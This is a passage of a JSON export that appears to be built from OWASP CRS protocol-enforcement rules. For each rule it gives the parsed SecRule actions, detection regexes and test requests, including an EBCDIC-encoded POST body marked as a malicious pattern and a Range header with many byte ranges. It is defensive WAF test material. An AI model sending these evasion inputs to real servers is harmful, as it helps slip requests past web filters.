"act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1578, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.notice_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 1576 } }, { "rule_id": "920490", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "x-up-devcap-post-charset", "negated": false } ], "operator": { "type": "@ge", "argument": "1", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Request header x-up-devcap-post-charset detected in combination with prefix \\'UP\\' to User-Agent", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "language-aspnet", "platform-windows", "attack-protocol", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "User-Agent": "UP OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8", "x-up-devcap-post-charset": "ibm500", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" }, "expected": { "should_block": true, "rule_ids": [ 920490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" } ] }, { "description": "", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8", "x-up-devcap-post-charset": "ibm500", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" }, "expected": { "should_block": false, "rule_ids": [ 920490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" } ] }, { "description": "", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" }, "expected": { "should_block": false, "rule_ids": [ 920490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1591, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "x-up-devcap-post-charset", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@ge", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 1592, "act_quote": "no_quote", "act_arg": "920490", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1593, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1594, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1595, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1596, "act_quote": "quotes", "act_arg": "Request header x-up-devcap-post-charset detected in combination with prefix \\'UP\\' to User-Agent", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1597, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1598, "act_quote": "quotes", "act_arg": "language-aspnet", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1599, "act_quote": "quotes", "act_arg": "platform-windows", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1600, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1601, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1602, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1603, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1604, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1605, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1606, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 1607, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1591 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?i)up", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1608, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?i)up", "actions": [ { "act_name": "t", "lineno": 1609, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1610, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1608 } }, { "rule_id": "920510", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Cache-Control", "negated": false } ], "operator": { "type": "@gt", "argument": "0", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Invalid Cache-Control request header", "logdata": "Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "header-allowlist", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "block request with a response cache-control directive in request", "test_id": 1, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Cache-Control": "private", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920510 ] }, "malicious_patterns": [] }, { "description": "block request with an invalid cache-control directive in request", "test_id": 2, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Cache-Control": "foo=bar", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920510 ] }, "malicious_patterns": [] }, { "description": "block request with an invalid cache-control directive in request with multiple directives", "test_id": 3, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Cache-Control": "max-age=1, foo=bar", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920510 ] }, "malicious_patterns": [] }, { "description": "block request with an invalid cache-control syntax in request with multiple directives", "test_id": 4, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Cache-Control": "max-age=1,,,max-stale=2", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920510 ] }, "malicious_patterns": [] }, { "description": "allow request with valid cache-control single directive", "test_id": 5, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Cache-Control": "no-cache", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920510 ] }, "malicious_patterns": [] }, { "description": "allow request with valid cache-control multiple directive", "test_id": 6, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Cache-Control": "max-age=123, max-stale, no-cache", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920510 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1643, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Cache-Control", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@gt", "operator_argument": "0", "actions": [ { "act_name": "id", "lineno": 1644, "act_quote": "no_quote", "act_arg": "920510", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1645, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1646, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1647, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1648, "act_quote": "quotes", "act_arg": "Invalid Cache-Control request header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1649, "act_quote": "quotes", "act_arg": "Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1650, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1651, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1652, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1653, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1654, "act_quote": "quotes", "act_arg": "header-allowlist", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1655, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1656, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1657, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1658, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1659, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1660, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 1661, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1643 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Cache-Control", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\\s*\\,\\s*|$)){1,7}$", "negated": true } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1662, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Cache-Control", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\\s*\\,\\s*|$)){1,7}$", "actions": [ { "act_name": "setvar", "lineno": 1663, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 1662 } }, { "rule_id": "920521", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Accept-Encoding", "negated": false } ], "operator": { "type": "@rx", "argument": "br|compress|deflate|(?:pack200-)?gzip|identity|\\*|^$|aes128gcm|exi|zstd|x-(?:compress|gzip)", "negated": true } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "1", "message": "Illegal Accept-Encoding header", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/255/153" ] }, "test_cases": [ { "description": "Allowed Accept-Encoding: gzip, deflate, br", "test_id": 1, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Host": "localhost", "Accept-Encoding": "gzip, deflate, br" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920521 ] }, "malicious_patterns": [] }, { "description": "Allowed Accept-Encoding: gzip,deflate,identity", "test_id": 2, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Host": "localhost", "Accept-Encoding": "gzip,deflate,identity" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920521 ] }, "malicious_patterns": [] }, { "description": "Allowed Accept-Encoding: compress;q=0.5, gzip;q=1.0", "test_id": 3, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Host": "localhost", "Accept-Encoding": "compress;q=0.5, gzip;q=1.0" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920521 ] }, "malicious_patterns": [] }, { "description": "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0", "test_id": 4, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Host": "localhost", "Accept-Encoding": "gzip;q=1.0, identity; q=0.5, *;q=0" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920521 ] }, "malicious_patterns": [] }, { "description": "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0", "test_id": 5, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Host": "localhost", "Accept-Encoding": "gzip;q=1.0, identity; q=0.5, *;q=0" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920521 ] }, "malicious_patterns": [] }, { "description": "Allowed empty Accept-Encoding", "test_id": 6, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Host": "localhost", "Accept-Encoding": "" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920521 ] }, "malicious_patterns": [] }, { "description": "Not allowed Accept-Encoding: foobar", "test_id": 7, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Host": "localhost", "Accept-Encoding": "foobar" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920521 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1675, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Accept-Encoding", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "br|compress|deflate|(?:pack200-)?gzip|identity|\\*|^$|aes128gcm|exi|zstd|x-(?:compress|gzip)", "actions": [ { "act_name": "id", "lineno": 1676, "act_quote": "no_quote", "act_arg": "920521", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1677, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1678, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1679, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1679, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1680, "act_quote": "quotes", "act_arg": "Illegal Accept-Encoding header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1681, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1682, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1683, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1684, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1685, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1686, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1687, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1688, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1689, "act_quote": "quotes", "act_arg": "capec/1000/255/153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1690, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1691, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1692, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 1675 } }, { "rule_id": "920017", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1694, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 1694, "act_quote": "no_quote", "act_arg": "920017", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1694, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1694, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1694, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1694, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1694, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 1694, "act_quote": "no_quote", "act_arg": "END-REQUEST-920-PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1694 } }, { "rule_id": "920018", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1695, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 1695, "act_quote": "no_quote", "act_arg": "920018", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1695, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1695, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1695, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1695, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1695, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 1695, "act_quote": "no_quote", "act_arg": "END-REQUEST-920-PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1695 } }, { "rule_id": "920202", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_BASENAME", "part": "", "negated": false } ], "operator": { "type": "@endsWith", "argument": ".pdf", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "Range: Too many fields for pdf request (6 or more)", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/4", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "This should FAIL with rule 920202 (PL4)", "test_id": 1, "request": { "method": "GET", "uri": "/get/index.pdf", "headers": { "Host": "localhost", "Range": "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920202 ] }, "malicious_patterns": [] }, { "description": "This should FAIL with rule 920202 (PL4), file name URI encoded", "test_id": 2, "request": { "method": "GET", "uri": "/get/index%2Epdf", "headers": { "Host": "localhost", "Range": "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920202 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1704, "variables": [ { "variable": "REQUEST_BASENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@endsWith", "operator_argument": ".pdf", "actions": [ { "act_name": "id", "lineno": 1705, "act_quote": "no_quote", "act_arg": "920202", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1706, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1707, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1708, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1708, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1709, "act_quote": "quotes", "act_arg": "Range: Too many fields for pdf request (6 or more)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1710, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1711, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1712, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1713, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1714, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1715, "act_quote": "quotes", "act_arg": "paranoia-level/4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1716, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1717, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1718, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1719, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1720, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 1721, "act_quote": "no_quote", "act_arg": 